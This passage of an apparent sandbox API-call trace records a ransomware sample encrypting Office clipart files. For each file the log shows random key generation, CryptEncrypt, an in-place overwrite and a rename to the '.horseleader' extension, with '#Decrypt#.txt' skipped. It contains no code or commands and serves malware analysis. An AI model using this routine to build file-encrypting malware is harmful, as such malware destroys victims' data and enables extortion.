pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 67 [0254.437] StrStrIW (lpFirst="DD01173_.WMF", lpSrch=".horseleader") returned 0x0 [0254.437] lstrcmpW (lpString1="DD01173_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.437] lstrcmpW (lpString1="DD01173_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.437] lstrlenW (lpString=".testttjffg") returned 11 [0254.438] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.438] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.438] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.438] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 67 [0254.445] StrStrW (lpFirst="DD01173_.WMF", lpSrch=".txt") returned 0x0 [0254.445] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1804) returned 1 [0254.445] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x70c, lpOverlapped=0x0) returned 1 [0254.493] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff8f4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.493] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x70c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x70c, lpOverlapped=0x0) returned 1 [0254.494] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.494] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.495] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.495] CloseHandle (hObject=0x158) returned 1 [0254.495] GetProcessHeap () returned 0x780000 [0254.495] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.495] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.horseleader") returned 79 [0254.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf.horseleader")) returned 1 [0254.496] GetProcessHeap () returned 0x780000 [0254.496] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.496] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x760, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01176_.WMF", cAlternateFileName="")) returned 1 [0254.496] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="Windows") returned -1 [0254.496] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 67 [0254.496] StrStrIW (lpFirst="DD01176_.WMF", lpSrch=".horseleader") returned 0x0 [0254.496] lstrcmpW (lpString1="DD01176_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.496] lstrcmpW (lpString1="DD01176_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.496] lstrlenW (lpString=".testttjffg") returned 11 [0254.497] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.497] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.497] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.497] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 67 [0254.497] StrStrW (lpFirst="DD01176_.WMF", lpSrch=".txt") returned 0x0 [0254.497] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1888) returned 1 [0254.498] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x760, lpOverlapped=0x0) returned 1 [0254.500] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff8a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.500] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x760, lpOverlapped=0x0) returned 1 [0254.501] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.501] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.501] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.501] CloseHandle (hObject=0x158) returned 1 [0254.501] GetProcessHeap () returned 0x780000 [0254.501] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.501] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.horseleader") returned 79 [0254.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf.horseleader")) returned 1 [0254.502] GetProcessHeap () returned 0x780000 [0254.502] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.502] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xed4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01178_.WMF", cAlternateFileName="")) returned 1 [0254.503] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="Windows") returned -1 [0254.503] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 67 [0254.503] StrStrIW (lpFirst="DD01178_.WMF", lpSrch=".horseleader") returned 0x0 [0254.503] lstrcmpW (lpString1="DD01178_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.503] lstrcmpW (lpString1="DD01178_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.503] lstrlenW (lpString=".testttjffg") returned 11 [0254.503] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.503] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.503] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.503] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.504] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 67 [0254.504] StrStrW (lpFirst="DD01178_.WMF", lpSrch=".txt") returned 0x0 [0254.504] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3796) returned 1 [0254.504] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xed4, lpOverlapped=0x0) returned 1 [0254.512] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff12c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.512] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xed4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xed4, lpOverlapped=0x0) returned 1 [0254.513] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.513] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.513] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.513] CloseHandle (hObject=0x158) returned 1 [0254.513] GetProcessHeap () returned 0x780000 [0254.513] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.513] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.horseleader") returned 79 [0254.513] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf.horseleader")) returned 1 [0254.515] GetProcessHeap () returned 0x780000 [0254.515] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.515] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7e8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01179_.WMF", cAlternateFileName="")) returned 1 [0254.515] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="Windows") returned -1 [0254.515] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 67 [0254.515] StrStrIW (lpFirst="DD01179_.WMF", lpSrch=".horseleader") returned 0x0 [0254.515] lstrcmpW (lpString1="DD01179_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.515] lstrcmpW (lpString1="DD01179_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.515] lstrlenW (lpString=".testttjffg") returned 11 [0254.515] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.515] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.515] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.515] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.516] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 67 [0254.516] StrStrW (lpFirst="DD01179_.WMF", lpSrch=".txt") returned 0x0 [0254.516] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2024) returned 1 [0254.516] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x7e8, lpOverlapped=0x0) returned 1 [0254.520] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff818, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.521] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x7e8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x7e8, lpOverlapped=0x0) returned 1 [0254.521] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.521] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.521] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.521] CloseHandle (hObject=0x158) returned 1 [0254.521] GetProcessHeap () returned 0x780000 [0254.521] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.521] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.horseleader") returned 79 [0254.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf.horseleader")) returned 1 [0254.523] GetProcessHeap () returned 0x780000 [0254.523] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.523] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x824, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01180_.WMF", cAlternateFileName="")) returned 1 [0254.523] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="Windows") returned -1 [0254.523] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 67 [0254.523] StrStrIW (lpFirst="DD01180_.WMF", lpSrch=".horseleader") returned 0x0 [0254.523] lstrcmpW (lpString1="DD01180_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.523] lstrcmpW (lpString1="DD01180_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.523] lstrlenW (lpString=".testttjffg") returned 11 [0254.523] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.523] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.523] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.523] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.524] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 67 [0254.524] StrStrW (lpFirst="DD01180_.WMF", lpSrch=".txt") returned 0x0 [0254.524] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2084) returned 1 [0254.524] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x824, lpOverlapped=0x0) returned 1 [0254.527] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff7dc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.527] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x824, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x824, lpOverlapped=0x0) returned 1 [0254.528] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.528] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.528] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.528] CloseHandle (hObject=0x158) returned 1 [0254.528] GetProcessHeap () returned 0x780000 [0254.528] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.528] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.horseleader") returned 79 [0254.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf.horseleader")) returned 1 [0254.530] GetProcessHeap () returned 0x780000 [0254.530] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.530] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5a8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01181_.WMF", cAlternateFileName="")) returned 1 [0254.530] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="Windows") returned -1 [0254.530] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 67 [0254.530] StrStrIW (lpFirst="DD01181_.WMF", lpSrch=".horseleader") returned 0x0 [0254.530] lstrcmpW (lpString1="DD01181_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.530] lstrcmpW (lpString1="DD01181_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.530] lstrlenW (lpString=".testttjffg") returned 11 [0254.530] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.530] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.530] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.530] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.535] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 67 [0254.535] StrStrW (lpFirst="DD01181_.WMF", lpSrch=".txt") returned 0x0 [0254.535] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1448) returned 1 [0254.535] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5a8, lpOverlapped=0x0) returned 1 [0254.537] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.537] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5a8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5a8, lpOverlapped=0x0) returned 1 [0254.537] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.537] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, 